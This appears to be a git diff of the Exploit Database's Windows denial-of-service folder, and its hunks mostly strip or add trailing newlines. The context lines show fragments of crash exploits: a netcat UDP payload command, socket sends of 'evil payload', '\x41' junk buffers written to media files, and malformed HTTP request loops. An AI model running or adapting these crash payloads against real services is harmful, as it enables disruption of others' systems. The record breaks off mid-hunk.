a/platforms/windows/dos/1192.cpp b/platforms/windows/dos/1192.cpp index 4469c298e..8ba9f44b2 100755 --- a/platforms/windows/dos/1192.cpp +++ b/platforms/windows/dos/1192.cpp @@ -95,4 +95,4 @@ WSACleanup(); return 0; } -// milw0rm.com [2005-09-02] +// milw0rm.com [2005-09-02] \ No newline at end of file diff --git a/platforms/windows/dos/11955.py b/platforms/windows/dos/11955.py index df6c75bea..60988fb5c 100755 --- a/platforms/windows/dos/11955.py +++ b/platforms/windows/dos/11955.py @@ -18,4 +18,4 @@ try: file.close() print ("[+] File created successfully: poc.ico" ) except: - print "[-] Error cant write file to system\n"""" + print "[-] Error cant write file to system\n"""" \ No newline at end of file diff --git a/platforms/windows/dos/11959.pl b/platforms/windows/dos/11959.pl index 2ac9a02d3..2140ee00e 100755 --- a/platforms/windows/dos/11959.pl +++ b/platforms/windows/dos/11959.pl @@ -28,4 +28,4 @@ $junk = "\x41" x 214; rename ("$song.wma", "$junk.wma"); print "Bury deep! \n"; -exit; +exit; \ No newline at end of file diff --git a/platforms/windows/dos/11984.py b/platforms/windows/dos/11984.py index cb29f8ff8..45c6dd56d 100755 --- a/platforms/windows/dos/11984.py +++ b/platforms/windows/dos/11984.py @@ -56,4 +56,4 @@ buff += ".txt" mefile = open('optimal.zip','w'); mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header); -mefile.close() +mefile.close() \ No newline at end of file diff --git a/platforms/windows/dos/11985.sh b/platforms/windows/dos/11985.sh index 70b080fc2..7b41ed269 100755 --- a/platforms/windows/dos/11985.sh +++ b/platforms/windows/dos/11985.sh @@ -24,4 +24,4 @@ fi nc -u $1 $2 << . d4294967285:y1:q1:t4:\x001:q4:ping1:ad2:id20:01234567890123456789ee -. +. \ No newline at end of file diff --git a/platforms/windows/dos/1199.c b/platforms/windows/dos/1199.c index 0d8148d78..7732205b7 100755 --- a/platforms/windows/dos/1199.c +++ b/platforms/windows/dos/1199.c @@ -98,4 +98,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2005-09-06] +// milw0rm.com [2005-09-06] \ No newline at end of file diff --git a/platforms/windows/dos/12000.pl b/platforms/windows/dos/12000.pl index d1201e70a..6f659896e 100755 --- a/platforms/windows/dos/12000.pl +++ b/platforms/windows/dos/12000.pl @@ -25,6 +25,4 @@ my $money = "payroll.mdb"; open (FILE, ">$money"); print FILE "$data"; -print "\nShow me the money!\n"; - - +print "\nShow me the money!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/12011.txt b/platforms/windows/dos/12011.txt index ec5a314fd..e66e71570 100755 --- a/platforms/windows/dos/12011.txt +++ b/platforms/windows/dos/12011.txt @@ -246,4 +246,4 @@ Charset: utf-8 wj8DBQFLs6gPkXxgcAIbhEERAlH6AKD+UgqYNZpBD40+o7Yl8HjdsaVM1QCffMKa pqw8f2DGxim/+N1k+jCqbcQ= =mHHh ------END PGP SIGNATURE----- +-----END PGP SIGNATURE----- \ No newline at end of file diff --git a/platforms/windows/dos/12025.php b/platforms/windows/dos/12025.php index f04246296..80fb385ec 100755 --- a/platforms/windows/dos/12025.php +++ b/platforms/windows/dos/12025.php @@ -19,5 +19,4 @@ if(file_put_contents('crash.bin', $buffer)) { # Cya :) # NULLBYTE.ORG.IL #################### -?> - +?> \ No newline at end of file diff --git a/platforms/windows/dos/12032.html b/platforms/windows/dos/12032.html index af64a36fd..85710a904 100755 --- a/platforms/windows/dos/12032.html +++ b/platforms/windows/dos/12032.html @@ -25,5 +25,4 @@ </html> -The ZSploit Team - +The ZSploit Team \ No newline at end of file diff --git a/platforms/windows/dos/12079.pl b/platforms/windows/dos/12079.pl index 3f59daf08..dcec2a2ff 100755 --- a/platforms/windows/dos/12079.pl +++ b/platforms/windows/dos/12079.pl @@ -45,4 +45,4 @@ all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R (http://www.ilegalintrusion.net/foro/) Cyb3r IntRue (avengers team) * The globin * Virus_Hima ---------------------------------------------------------------------------------------------------------------- +--------------------------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/windows/dos/12080.txt b/platforms/windows/dos/12080.txt index 0cf5b77f9..56e2d5949 100755 --- a/platforms/windows/dos/12080.txt +++ b/platforms/windows/dos/12080.txt @@ -23,5 +23,4 @@ Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sp Regards -juza - +juza \ No newline at end of file diff --git a/platforms/windows/dos/12096.txt b/platforms/windows/dos/12096.txt index aeb99323a..8f1929828 100755 --- a/platforms/windows/dos/12096.txt +++ b/platforms/windows/dos/12096.txt @@ -22,6 +22,4 @@ open (FILE, ">$music"); print FILE "$mic"; close FILE; -print "\nIt's a mix between Jazz and Funk, it's called Junk!"; - - +print "\nIt's a mix between Jazz and Funk, it's called Junk!"; \ No newline at end of file diff --git a/platforms/windows/dos/12110.pl b/platforms/windows/dos/12110.pl index 4a172fefa..04bd4613c 100755 --- a/platforms/windows/dos/12110.pl +++ b/platforms/windows/dos/12110.pl @@ -32,5 +32,4 @@ print "\n[x]CompleteFTP v3.3.0 - Remote Memory Consumption DoS\n"; $socket->recv($answer,2048); $socket->send($login); $socket->send($pwd); - } - + } \ No newline at end of file diff --git a/platforms/windows/dos/1212.pl b/platforms/windows/dos/1212.pl index 4d265bdd7..2bd07a817 100755 --- a/platforms/windows/dos/1212.pl +++ b/platforms/windows/dos/1212.pl @@ -49,4 +49,4 @@ print "[+] Check if server crash!\n"; close(SOCK); exit; -# milw0rm.com [2005-09-11] +# milw0rm.com [2005-09-11] \ No newline at end of file diff --git a/platforms/windows/dos/12161.pl b/platforms/windows/dos/12161.pl index fbc997149..6efd99790 100755 --- a/platforms/windows/dos/12161.pl +++ b/platforms/windows/dos/12161.pl @@ -59,4 +59,4 @@ print etv $djubre x 100; print "\n [o] Writing to file...\n"; sleep 1; close etv; -print "\n [o] File $fajl created.\n"; +print "\n [o] File $fajl created.\n"; \ No newline at end of file diff --git a/platforms/windows/dos/1218.c b/platforms/windows/dos/1218.c index 71fb5f781..5fe37c9c2 100755 --- a/platforms/windows/dos/1218.c +++ b/platforms/windows/dos/1218.c @@ -125,4 +125,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2005-09-16] +// milw0rm.com [2005-09-16] \ No newline at end of file diff --git a/platforms/windows/dos/1220.pl b/platforms/windows/dos/1220.pl index d014ed7ba..1fdfe1829 100755 --- a/platforms/windows/dos/1220.pl +++ b/platforms/windows/dos/1220.pl @@ -38,4 +38,4 @@ exit(); #EoF -# milw0rm.com [2005-09-16] +# milw0rm.com [2005-09-16] \ No newline at end of file diff --git a/platforms/windows/dos/1222.pl b/platforms/windows/dos/1222.pl index 72a579e18..317d21f3b 100755 --- a/platforms/windows/dos/1222.pl +++ b/platforms/windows/dos/1222.pl @@ -35,4 +35,4 @@ print "press any key to exit..\n"; $bla= <STDIN>; close $remote; -# milw0rm.com [2005-09-19] +# milw0rm.com [2005-09-19] \ No newline at end of file diff --git a/platforms/windows/dos/12228.py b/platforms/windows/dos/12228.py index 0e944bd82..5b9cf7ccf 100755 --- a/platforms/windows/dos/12228.py +++ b/platforms/windows/dos/12228.py @@ -24,4 +24,4 @@ VHS=open('oldies.dmv', 'w') VHS.write('\x00') VHS.close() -print 'Running Time: Approximately 5 sec till DoS.\n' +print 'Running Time: Approximately 5 sec till DoS.\n' \ No newline at end of file diff --git a/platforms/windows/dos/12240.py b/platforms/windows/dos/12240.py index ee0442760..5a97f191e 100755 --- a/platforms/windows/dos/12240.py +++ b/platforms/windows/dos/12240.py @@ -62,4 +62,4 @@ s.send("\x02") print "[+] Sending evil payload.. ph33r o.O" s.send(exploit) print '[+] Check for the calc!' -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/12274.py b/platforms/windows/dos/12274.py index d01a91bdf..6b9457b3d 100755 --- a/platforms/windows/dos/12274.py +++ b/platforms/windows/dos/12274.py @@ -122,5 +122,4 @@ try: print "Error in send" print "Done" except: - print "Error in socket" - + print "Error in socket" \ No newline at end of file diff --git a/platforms/windows/dos/12314.py b/platforms/windows/dos/12314.py index d051d5c08..60f41888a 100755 --- a/platforms/windows/dos/12314.py +++ b/platforms/windows/dos/12314.py @@ -52,4 +52,4 @@ buff += ".txt" mefile = open('SpeedCommander.zip','w'); mefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header); -mefile.close() +mefile.close() \ No newline at end of file diff --git a/platforms/windows/dos/1235.c b/platforms/windows/dos/1235.c index b4f09e6d5..432f35723 100755 --- a/platforms/windows/dos/1235.c +++ b/platforms/windows/dos/1235.c @@ -229,4 +229,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2005-09-26] +// milw0rm.com [2005-09-26] \ No newline at end of file diff --git a/platforms/windows/dos/1239.c b/platforms/windows/dos/1239.c index 22a174e10..a674dfe6a 100755 --- a/platforms/windows/dos/1239.c +++ b/platforms/windows/dos/1239.c @@ -231,4 +231,4 @@ void std_err(void) { exit(1); } -// milw0rm.com [2005-10-02] +// milw0rm.com [2005-10-02] \ No newline at end of file diff --git a/platforms/windows/dos/1246.pl b/platforms/windows/dos/1246.pl index c8fad165d..339e15a48 100755 --- a/platforms/windows/dos/1246.pl +++ b/platforms/windows/dos/1246.pl @@ -62,4 +62,4 @@ print "..press any key to exit\n"; $bla= ; close $remote; -# milw0rm.com [2005-10-11] +# milw0rm.com [2005-10-11] \ No newline at end of file diff --git a/platforms/windows/dos/12487.html b/platforms/windows/dos/12487.html index 49ac1ceeb..4c851e1b3 100755 --- a/platforms/windows/dos/12487.html +++ b/platforms/windows/dos/12487.html @@ -43,4 +43,4 @@ function b() setInterval(a,0); } </script> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/1251.pl b/platforms/windows/dos/1251.pl index d0a7e83de..207043910 100755 --- a/platforms/windows/dos/1251.pl +++ b/platforms/windows/dos/1251.pl @@ -35,4 +35,4 @@ print "Attack done. press any key to exit\n"; $bla= <STDIN>; close $remote; -# milw0rm.com [2005-10-14] +# milw0rm.com [2005-10-14] \ No newline at end of file diff --git a/platforms/windows/dos/12518.pl b/platforms/windows/dos/12518.pl index 7e46fe62b..db6cc7e53 100755 --- a/platforms/windows/dos/12518.pl +++ b/platforms/windows/dos/12518.pl @@ -64,4 +64,4 @@ open(file , ">", "paint.jpg"); print file $PoC; -close(file); +close(file); \ No newline at end of file diff --git a/platforms/windows/dos/12524.py b/platforms/windows/dos/12524.py index 5711f7046..7585579ac 100755 --- a/platforms/windows/dos/12524.py +++ b/platforms/windows/dos/12524.py @@ -23,6 +23,4 @@ while 1: break print "[+] Closing connection... This is part of the exploit" smbconn.close() -print "[+] Done, if all went good then the box on the other side crashed" - - +print "[+] Done, if all went good then the box on the other side crashed" \ No newline at end of file diff --git a/platforms/windows/dos/12529.py b/platforms/windows/dos/12529.py index b59508cfb..b3cdf061b 100755 --- a/platforms/windows/dos/12529.py +++ b/platforms/windows/dos/12529.py @@ -38,4 +38,4 @@ f.write(data) f.close() print "TEST.LZH (%d bytes) created" % len(data) -print "Now try to scan it with antivirus" +print "Now try to scan it with antivirus" \ No newline at end of file diff --git a/platforms/windows/dos/12530.rb b/platforms/windows/dos/12530.rb index a007ab179..83b49f54c 100755 --- a/platforms/windows/dos/12530.rb +++ b/platforms/windows/dos/12530.rb @@ -68,4 +68,4 @@ class Metasploit3 < Msf::Auxiliary udp_sock.put($stuff) disconnect_udp end -end +end \ No newline at end of file diff --git a/platforms/windows/dos/12531.pl b/platforms/windows/dos/12531.pl index 63f153425..2581d7621 100755 --- a/platforms/windows/dos/12531.pl +++ b/platforms/windows/dos/12531.pl @@ -36,5 +36,4 @@ print "Sending HTTP request..\n"; print $sock $req; print "Exploited. Target should be DoSed\n"; -close $sock; - +close $sock; \ No newline at end of file diff --git a/platforms/windows/dos/12541.php b/platforms/windows/dos/12541.php index a6280e583..c80f5bc1e 100755 --- a/platforms/windows/dos/12541.php +++ b/platforms/windows/dos/12541.php @@ -19,4 +19,4 @@ if(file_put_contents('crash.elf', $buffer)) { # Cya :) # NULLBYTE.ORG.IL #################### -?> +?> \ No newline at end of file diff --git a/platforms/windows/dos/1255.html b/platforms/windows/dos/1255.html index af55499a0..f4bdfe2e2 100755 --- a/platforms/windows/dos/1255.html +++ b/platforms/windows/dos/1255.html @@ -23,4 +23,4 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA <u BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB> </body></html> -# milw0rm.com [2005-10-16] +# milw0rm.com [2005-10-16] \ No newline at end of file diff --git a/platforms/windows/dos/12578.c b/platforms/windows/dos/12578.c index 96b72dc2a..8f5e03656 100755 --- a/platforms/windows/dos/12578.c +++ b/platforms/windows/dos/12578.c @@ -709,4 +709,4 @@ int main(int argc, char *argv[]) return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/12603.py b/platforms/windows/dos/12603.py index b34087ae2..47c845bf2 100755 --- a/platforms/windows/dos/12603.py +++ b/platforms/windows/dos/12603.py @@ -50,4 +50,4 @@ else: exploit(hostname,username,password) sys.exit(0) -# End +# End \ No newline at end of file diff --git a/platforms/windows/dos/12604.py b/platforms/windows/dos/12604.py index b41ee7afd..38c248d77 100755 --- a/platforms/windows/dos/12604.py +++ b/platforms/windows/dos/12604.py @@ -54,4 +54,4 @@ else: exploit(hostname,username,password) sys.exit(0) -# End +# End \ No newline at end of file diff --git a/platforms/windows/dos/12605.html b/platforms/windows/dos/12605.html index 1f4d70403..941d292dc 100755 --- a/platforms/windows/dos/12605.html +++ b/platforms/windows/dos/12605.html @@ -47,4 +47,4 @@ target.DoWebMenuAction crash </script> <b><center>IncrediMail ImShExtU.dll ActiveX Memory Corruption</b></center> -</html> +</html> \ No newline at end of file diff --git a/platforms/windows/dos/12650.txt b/platforms/windows/dos/12650.txt index e58001583..607c8e3bf 100755 --- a/platforms/windows/dos/12650.txt +++ b/platforms/windows/dos/12650.txt @@ -59,7 +59,4 @@ target.ControlID = arg1 </script></job></package></html> -___________________________________________________________________________________________ - - - +___________________________________________________________________________________________ \ No newline at end of file diff --git a/platforms/windows/dos/1266.py b/platforms/windows/dos/1266.py index f65629a73..2f7e5c872 100755 --- a/platforms/windows/dos/1266.py +++ b/platforms/windows/dos/1266.py @@ -97,4 +97,4 @@ s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) s.sendto(request, victim) print " Ethereal should be crashed ! ;)" -# milw0rm.com [2005-10-20] +# milw0rm.com [2005-10-20] \ No newline at end of file diff --git a/platforms/windows/dos/1269.c b/platforms/windows/dos/1269.c index 98955cb24..24ae3cc39 100755 --- a/platforms/windows/dos/1269.c +++ b/platforms/windows/dos/1269.c @@ -213,4 +213,4 @@ int main(int argc, char* argv[]) return 0; } -// milw0rm.com [2005-10-21] +// milw0rm.com [2005-10-21] \ No newline at end of file diff --git a/platforms/windows/dos/12698.py b/platforms/windows/dos/12698.py index 885471036..0ab82487f 100755 --- a/platforms/windows/dos/12698.py +++ b/platforms/windows/dos/12698.py @@ -37,4 +37,4 @@ s.send('USER %s\r\n' % "anonymous") for i in range(1,31): s.send('PORT %s\n\n' % buffer) - print "Sending request n. " + str(i) + print "Sending request n. " + str(i) \ No newline at end of file diff --git a/platforms/windows/dos/1271.c b/platforms/windows/dos/1271.c index 4de1360b0..f7a5196bb 100755 --- a/platforms/windows/dos/1271.c +++ b/platforms/windows/dos/1271.c @@ -379,4 +379,4 @@ printf("==========================================\n\n"); printf("\033[0;32mOK\033[0;39m\n"); } -// milw0rm.com [2005-10-24] +// milw0rm.com [2005-10-24] \ No newline at end of file diff --git a/platforms/windows/dos/12740.py b/platforms/windows/dos/12740.py index 19d569c99..ef706e06f 100755 --- a/platforms/windows/dos/12740.py +++ b/platforms/windows/dos/12740.py @@ -53,4 +53,4 @@ print "..." print payload s.send(payload) print "finished kicking method %s with payload %s" % (method,payload) -print "... the service should be crashed ... check SEH" +print "... the service should be crashed ... check SEH" \ No newline at end of file diff --git a/platforms/windows/dos/12752.c b/platforms/windows/dos/12752.c index eefaa1699..efeef42d3 100755 --- a/platforms/windows/dos/12752.c +++ b/platforms/windows/dos/12752.c @@ -419,4 +419,4 @@ int main(int argc, char *argv[]) printf("\nDone!\n"); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/12753.c b/platforms/windows/dos/12753.c index 4d3b70e26..ac1eaef56 100755 --- a/platforms/windows/dos/12753.c +++ b/platforms/windows/dos/12753.c @@ -3382,4 +3382,4 @@ memcpy(thricer+strlen(styleh)+strlen(boomski)+stylef,strlen(stylef)); fp = fopen(FILENAME,"wb"); if(fp==NULL){ perror ("Oops! Can't open file.\n"); } fwrite(thricer,1,sizeof(thricer),fp); -fclose(fp); sleep(1); printf("\nDone!\n"); return 0; } +fclose(fp); sleep(1); printf("\nDone!\n"); return 0; } \ No newline at end of file diff --git a/platforms/windows/dos/1276.html b/platforms/windows/dos/1276.html index 9c9625edc..ec8537a8c 100755 --- a/platforms/windows/dos/1276.html +++ b/platforms/windows/dos/1276.html @@ -58,4 +58,4 @@ www.evolvesecurity.com // commented the advisory for exploit testing /str0ke --> -# milw0rm.com [2005-10-28] +# milw0rm.com [2005-10-28] \ No newline at end of file diff --git a/platforms/windows/dos/1281.c b/platforms/windows/dos/1281.c index 512c9e25c..51afc24b9 100755 --- a/platforms/windows/dos/1281.c +++ b/platforms/windows/dos/1281.c @@ -286,4 +286,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2005-11-02] +// milw0rm.com [2005-11-02] \ No newline at end of file diff --git a/platforms/windows/dos/12816.py b/platforms/windows/dos/12816.py index a8e2a3225..048f1fc9e 100755 --- a/platforms/windows/dos/12816.py +++ b/platforms/windows/dos/12816.py @@ -36,4 +36,4 @@ dos = "\x41" * 2000 mefile = open('tecr0c.zar','w'); mefile.write(dos); -mefile.close() +mefile.close() \ No newline at end of file diff --git a/platforms/windows/dos/1282.c b/platforms/windows/dos/1282.c index 0b1ad42ff..7854c40ac 100755 --- a/platforms/windows/dos/1282.c +++ b/platforms/windows/dos/1282.c @@ -180,4 +180,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2005-11-02] +// milw0rm.com [2005-11-02] \ No newline at end of file diff --git a/platforms/windows/dos/1283.c b/platforms/windows/dos/1283.c index f6e81f19c..7bc565091 100755 --- a/platforms/windows/dos/1283.c +++ b/platforms/windows/dos/1283.c @@ -280,4 +280,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2005-11-02] +// milw0rm.com [2005-11-02] \ No newline at end of file diff --git a/platforms/windows/dos/1284.c b/platforms/windows/dos/1284.c index ae9e81458..0862f8b4c 100755 --- a/platforms/windows/dos/1284.c +++ b/platforms/windows/dos/1284.c @@ -222,4 +222,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2005-11-02] +// milw0rm.com [2005-11-02] \ No newline at end of file diff --git a/platforms/windows/dos/1285.c b/platforms/windows/dos/1285.c index e597dfb3a..b9f4f21af 100755 --- a/platforms/windows/dos/1285.c +++ b/platforms/windows/dos/1285.c @@ -532,4 +532,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2005-11-02] +// milw0rm.com [2005-11-02] \ No newline at end of file diff --git a/platforms/windows/dos/1286.c b/platforms/windows/dos/1286.c index 92e4ed054..30f686f4a 100755 --- a/platforms/windows/dos/1286.c +++ b/platforms/windows/dos/1286.c @@ -193,4 +193,4 @@ int main(int argc, char *argv[]) { } #endif -// milw0rm.com [2005-11-02] +// milw0rm.com [2005-11-02] \ No newline at end of file diff --git a/platforms/windows/dos/1287.c b/platforms/windows/dos/1287.c index 584556387..4adee8f72 100755 --- a/platforms/windows/dos/1287.c +++ b/platforms/windows/dos/1287.c @@ -205,4 +205,4 @@ u_int resolv(char *host) { } #endif -// milw0rm.com [2005-11-02] +// milw0rm.com [2005-11-02] \ No newline at end of file diff --git a/platforms/windows/dos/13.c b/platforms/windows/dos/13.c index c8df68474..27dddb8a9 100755 --- a/platforms/windows/dos/13.c +++ b/platforms/windows/dos/13.c @@ -71,4 +71,4 @@ for (count=0; count<9999; count++) send(sockfd,DOS,strlen(DOS),0); close(sockfd); -// milw0rm.com [2003-04-18] +// milw0rm.com [2003-04-18] \ No newline at end of file diff --git a/platforms/windows/dos/1327.pl b/platforms/windows/dos/1327.pl index 1d8fc8800..93b366c72 100755 --- a/platforms/windows/dos/1327.pl +++ b/platforms/windows/dos/1327.pl @@ -34,4 +34,4 @@ print "\n[!] Done\n\n\n"; close $remote; -# milw0rm.com [2005-11-16] +# milw0rm.com [2005-11-16] \ No newline at end of file diff --git a/platforms/windows/dos/1328.c b/platforms/windows/dos/1328.c index 09590bc8d..d9947193b 100755 --- a/platforms/windows/dos/1328.c +++ b/platforms/windows/dos/1328.c @@ -327,4 +327,4 @@ int main(int argc, char *argv[]) close(sockfd); } -// milw0rm.com [2005-11-16] +// milw0rm.com [2005-11-16] \ No newline at end of file diff --git a/platforms/windows/dos/1336.cpp b/platforms/windows/dos/1336.cpp index 3c4305a41..2cf8b677f 100755 --- a/platforms/windows/dos/1336.cpp +++ b/platforms/windows/dos/1336.cpp @@ -107,4 +107,4 @@ int _tmain(int argc, _TCHAR* argv[]) return 0; } -// milw0rm.com [2005-11-21] +// milw0rm.com [2005-11-21] \ No newline at end of file diff --git a/platforms/windows/dos/1339.c b/platforms/windows/dos/1339.c index 542887a42..5aa5c2832 100755 --- a/platforms/windows/dos/1339.c +++ b/platforms/windows/dos/1339.c @@ -137,4 +137,4 @@ return uhost; } -// milw0rm.com [2005-11-24] +// milw0rm.com [2005-11-24] \ No newline at end of file diff --git a/platforms/windows/dos/1341.c b/platforms/windows/dos/1341.c index f746d5f4f..7231670df 100755 --- a/platforms/windows/dos/1341.c +++ b/platforms/windows/dos/1341.c @@ -205,4 +205,4 @@ int main ( int argc, char *argv[] ) } -// milw0rm.com [2005-11-27] +// milw0rm.com [2005-11-27] \ No newline at end of file diff --git a/platforms/windows/dos/1343.c b/platforms/windows/dos/1343.c index ef66c7819..9a0b39dda 100755 --- a/platforms/windows/dos/1343.c +++ b/platforms/windows/dos/1343.c @@ -72,4 +72,4 @@ int main(int argc, char *argv[]) fclose(fp); } -// milw0rm.com [2005-11-29] +// milw0rm.com [2005-11-29] \ No newline at end of file diff --git a/platforms/windows/dos/1346.c b/platforms/windows/dos/1346.c index 8deedf123..60bfd38cb 100755 --- a/platforms/windows/dos/1346.c +++ b/platforms/windows/dos/1346.c @@ -108,4 +108,4 @@ int main(int argc, char *argv[]) fclose(fp); } -// milw0rm.com [2005-11-30] +// milw0rm.com [2005-11-30] \ No newline at end of file diff --git a/platforms/windows/dos/1353.py b/platforms/windows/dos/1353.py index 4d432316b..c70aeabe4 100755 --- a/platforms/windows/dos/1353.py +++ b/platforms/windows/dos/1353.py @@ -41,4 +41,4 @@ exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM) exp.connect((host,port)) exp.send(request) -# milw0rm.com [2005-12-02] +# milw0rm.com [2005-12-02] \ No newline at end of file diff --git a/platforms/windows/dos/1362.html b/platforms/windows/dos/1362.html index 8737dfd2c..fbc6cb503 100755 --- a/platforms/windows/dos/1362.html +++ b/platforms/windows/dos/1362.html @@ -31,4 +31,4 @@ function ex() { </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body></html> -# milw0rm.com [2005-12-07] +# milw0rm.com [2005-12-07] \ No newline at end of file diff --git a/platforms/windows/dos/1368.cpp b/platforms/windows/dos/1368.cpp index 613bda891..a50cb1674 100755 --- a/platforms/windows/dos/1368.cpp +++ b/platforms/windows/dos/1368.cpp @@ -123,4 +123,4 @@ int main(int argc, char *argv[]) } -// milw0rm.com [2005-12-11] +// milw0rm.com [2005-12-11] \ No newline at end of file diff --git a/platforms/windows/dos/1371.c b/platforms/windows/dos/1371.c index 5bbff4fe9..bc11da4f6 100755 --- a/platforms/windows/dos/1371.c +++ b/platforms/windows/dos/1371.c @@ -85,4 +85,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2005-12-14] +// milw0rm.com [2005-12-14] \ No newline at end of file diff --git a/platforms/windows/dos/1372.html b/platforms/windows/dos/1372.html index c955a760d..c1d671101 100755 --- a/platforms/windows/dos/1372.html +++ b/platforms/windows/dos/1372.html @@ -19,4 +19,4 @@ </html> -# milw0rm.com [2005-12-14] +# milw0rm.com [2005-12-14] \ No newline at end of file diff --git a/platforms/windows/dos/1376.c b/platforms/windows/dos/1376.c index 9fec3a761..d34e013f0 100755 --- a/platforms/windows/dos/1376.c +++ b/platforms/windows/dos/1376.c @@ -135,4 +135,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2005-12-19] +// milw0rm.com [2005-12-19] \ No newline at end of file diff --git a/platforms/windows/dos/1377.pl b/platforms/windows/dos/1377.pl index 5a1454c14..4b2eaedb3 100755 --- a/platforms/windows/dos/1377.pl +++ b/platforms/windows/dos/1377.pl @@ -45,4 +45,4 @@ print $socket "GET " . $malformed . " HTTP/1.0\r\n" . "Host: $target\r\n" . "\r\ close $socket; } -# milw0rm.com [2005-12-19] +# milw0rm.com [2005-12-19] \ No newline at end of file diff --git a/platforms/windows/dos/13837.pl b/platforms/windows/dos/13837.pl index e5fcbf2bd..93ad56b6d 100755 --- a/platforms/windows/dos/13837.pl +++ b/platforms/windows/dos/13837.pl @@ -24,4 +24,4 @@ $XP10_hacker="\nbody {alink: "."A/" x 8000000 ."}\n"; open(file ,'>>X.mpcpl'); print file $XP10_hacker; print "CODED BY R3d-D3V!L~#\n"; -close(file); +close(file); \ No newline at end of file diff --git a/platforms/windows/dos/13838.pl b/platforms/windows/dos/13838.pl index af58b4858..e6f551067 100755 --- a/platforms/windows/dos/13838.pl +++ b/platforms/windows/dos/13838.pl @@ -40,5 +40,4 @@ open(FILE,">$play"); print FILE $buffer; close(FILE); -print "[+] Music Provided by chap0 visit www.corelan.be:8800\n"; - +print "[+] Music Provided by chap0 visit www.corelan.be:8800\n"; \ No newline at end of file diff --git a/platforms/windows/dos/1389.html b/platforms/windows/dos/1389.html index c8ffc1028..06ed66109 100755 --- a/platforms/windows/dos/1389.html +++ b/platforms/windows/dos/1389.html @@ -1,3 +1,3 @@ <table datasrc="."> -# milw0rm.com [2005-12-27] +# milw0rm.com [2005-12-27] \ No newline at end of file diff --git a/platforms/windows/dos/13919.c b/platforms/windows/dos/13919.c index 45fc32ba3..d55d2b0f8 100755 --- a/platforms/windows/dos/13919.c +++ b/platforms/windows/dos/13919.c @@ -1616,4 +1616,4 @@ perror("\nError"); exit(1); } - + \ No newline at end of file diff --git a/platforms/windows/dos/13921.c b/platforms/windows/dos/13921.c index 680933878..0bd2cb96d 100755 --- a/platforms/windows/dos/13921.c +++ b/platforms/windows/dos/13921.c @@ -257,4 +257,4 @@ void error_handle(void){ perror("\nError"); exit(1); - } + } \ No newline at end of file diff --git a/platforms/windows/dos/1394.html b/platforms/windows/dos/1394.html index e9262e1d4..0e9603ea9 100755 --- a/platforms/windows/dos/1394.html +++ b/platforms/windows/dos/1394.html @@ -18,4 +18,4 @@ original poc: http://rgod.altervista.org/ie_6_sp2_crash.html </head> <body><div id="page"><div><p><strong>suntzu</strong></p> -# milw0rm.com [2005-12-29] +# milw0rm.com [2005-12-29] \ No newline at end of file diff --git a/platforms/windows/dos/13959.c b/platforms/windows/dos/13959.c index f0a689e8a..3e8a9f04b 100755 --- a/platforms/windows/dos/13959.c +++ b/platforms/windows/dos/13959.c @@ -241,4 +241,4 @@ UPDATE: version 3.0.0-beta25 -####################################################################### +####################################################################### \ No newline at end of file diff --git a/platforms/windows/dos/1396.cpp b/platforms/windows/dos/1396.cpp index ab5bd1dce..8dace204c 100755 --- a/platforms/windows/dos/1396.cpp +++ b/platforms/windows/dos/1396.cpp @@ -119,4 +119,4 @@ int main(int argc, char *argv[]) return 0; } -// milw0rm.com [2005-12-29] +// milw0rm.com [2005-12-29] \ No newline at end of file diff --git a/platforms/windows/dos/14071.pl b/platforms/windows/dos/14071.pl index 73e085eda..db36c818c 100755 --- a/platforms/windows/dos/14071.pl +++ b/platforms/windows/dos/14071.pl @@ -9,4 +9,4 @@ my $file= "MadjiX.m3u"; my $junk1= "\x41" x 100000 ; open($FILE,">$file"); print $FILE $junk1 ; -close($FILE); +close($FILE); \ No newline at end of file diff --git a/platforms/windows/dos/14072.c b/platforms/windows/dos/14072.c index 1c830aaf0..6ce098509 100755 --- a/platforms/windows/dos/14072.c +++ b/platforms/windows/dos/14072.c @@ -128,4 +128,4 @@ } void copy_str(i8* v,i8* w,i32 len){ memcpy(v,w,len); - } + } \ No newline at end of file diff --git a/platforms/windows/dos/1409.pl b/platforms/windows/dos/1409.pl index 8ce958f04..215dde9bf 100755 --- a/platforms/windows/dos/1409.pl +++ b/platforms/windows/dos/1409.pl @@ -46,4 +46,4 @@ print "[+] DoS string has been sent."; close($sock); -# milw0rm.com [2006-01-07] +# milw0rm.com [2006-01-07] \ No newline at end of file diff --git a/platforms/windows/dos/14102.py b/platforms/windows/dos/14102.py index c2f57faf0..a6f9b0b03 100755 --- a/platforms/windows/dos/14102.py +++ b/platforms/windows/dos/14102.py @@ -34,5 +34,4 @@ 